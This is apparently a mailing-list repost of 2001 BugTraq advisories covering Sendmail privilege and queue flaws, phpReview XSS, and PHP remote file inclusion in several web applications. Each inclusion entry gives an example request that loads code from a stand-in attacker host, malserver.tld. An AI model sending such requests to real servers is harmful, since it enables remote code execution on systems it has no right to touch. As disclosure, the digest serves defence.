Sendmail Inadequate Privilege Lowering Vulnerability BugTraq ID: 3377 Remote: No Date Published: 2001-10-01 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3377 Summary:
Sendmail is a widely used MTA often shipped with Unix systems. Prior to version 8.12.0, the 'sendmail' executable was installed setuid root. To minimize the consequences of locally exploitable vulnerabilities in 'sendmail' (ie, users gaining root access), Sendmail was re-worked in version 8.12.0 to run with the privileges of a special non-root mail group. One area of Sendmail that was not properly adjusted for the new privilege level was the configuration file processing component. With Sendmail, users can specify custom configuration files at the command line. During the processing of this user-supplied data, Sendmail drops privileges completely as a security precaution. Processing glitches such as signed integer errors and other bugs in this component of sendmail are not normally security vulnerabilities (as privileges are supposed to have been completely lowered when it runs). In version 8.12.0, the 'sendmail' utility is setgid instead of setuid. To lower privileges, the 'setgid()' system call is used. This system call does not set the saved groupid. It is therefore possible to reclaim the effective groupid if an attacker can force the process to call 'setregid()'. This may be possible by exploiting some of the parsing bugs present in the configuration file processor. If an attacker elevates privileges, the mail subsystem may be compromised. The attacker can then modify user mail files and the queue. There exist possibilities for further privilege elevation once an attacker has gained control over sendmail and the queue files. [ donc, sendmail a enfin une structure multi-groupes ] Sendmail Queue Processing Data Loss/DoS Vulnerability BugTraq ID: 3378 Remote: No Date Published: 2001-10-01 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3378 Summary: Sendmail is a freely available, widely deployed Mail Transport Agent (MTA). It is maintained by the Sendmail Consortium. A problem in the software has been discovered that could allow an attacker to deny services to legitimate users of a sendmail system. The problem is due to a programming error in the software. Sendmail allows regular users to force processing of the entire mail queue. When running 'sendmail', users can change key configuration variables such as setting the message hop count to a value greater than the limit imposed by sendmail. In doing so, mail in the queue will be dropped when it is processed. If exploited, an attacker can cause a data loss/denial of service. Hans Wolters phpReview Cross-Site Scripting Vulnerability BugTraq ID: 3380 Remote: Yes Date Published: 2001-10-01 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3380 Summary: phpReview is a freely available, open-source customizable web "reviewing" application. It allows users to enter and maintain reviews of such things as books, films, etc. phpReview does not filter HTML tags from user-submitted reviews. As a result, it is possible for a malicious user to include malicious script code in reviews. Successfully exploited, the script code will be executed on a web user who browses the maliciously crafted review and will appear to originate from the website running the software. This issue opens up web users to cross-site scripting attacks and may potentially be leveraged to do such things as steal cookie-based authentication credentials. Marc Logemann More.groupware Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3383 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3383 Summary: More.groupware is freely available, open-source web-based groupware. It allows users to collaborate online through a web interface. A problem exists in More.groupware that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode Actionpoll Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3384 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3384 Summary: Actionpoll is a freely available, open-source PHP voting script. It allows surveys to be stored in a MySQL database or in textfiles. A problem exists in Actionpoll that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode AWOL Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3387 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3387 Summary: AWOL is a free, open-source PHP script which provides a web interface to simulate an In/Out board. A problem exists in AWOL that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode Paul M. Jones Phorecast Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3388 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3388 Summary: Phorecast is freely available, open-source web-based single-user email. It allows users to send and receive email through a web-based interface. A problem exists in Phorecast that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode CCC Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3389 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3389 Summary: CCC is a free, open-source web-based inventory tracking system written in PHP. It also offers contact management, job tracking, job billing, etc. A problem exists in CCC that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode Dark Hart Portal Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3390 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3390 Summary: Dark Hart Portal is a free, open-source web portal that is written in PHP. A problem exists in Dark Hart Portal that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode Peaceworks Computer Consulting Phormation Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3393 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3393 Summary: Phormation is a freely available, open-source set of PHP functions. It allows users to create any type of HTML form with a database backend. A problem exists in Phormation that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode Derek Leung pSlash Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3395 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3395 Summary: pSlash is freely available, open-source web portal software. It allows users to create their own websites based on a template. A problem exists in pSlash that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode Bharat Mediratta Gallery Remote Arbitrary Code Execution Vulnerability BugTraq ID: 3397 Remote: Yes Date Published: 2001-10-02 00:00:00 Relevant URL: http://www.securityfocus.com/bid/3397 Summary: Gallery is freely available, open-source web based gallery software. It allows users to create their own web galleries based on a template. A problem exists in Gallery that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker: http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode - Pour poster une annonce: [EMAIL PROTECTED]
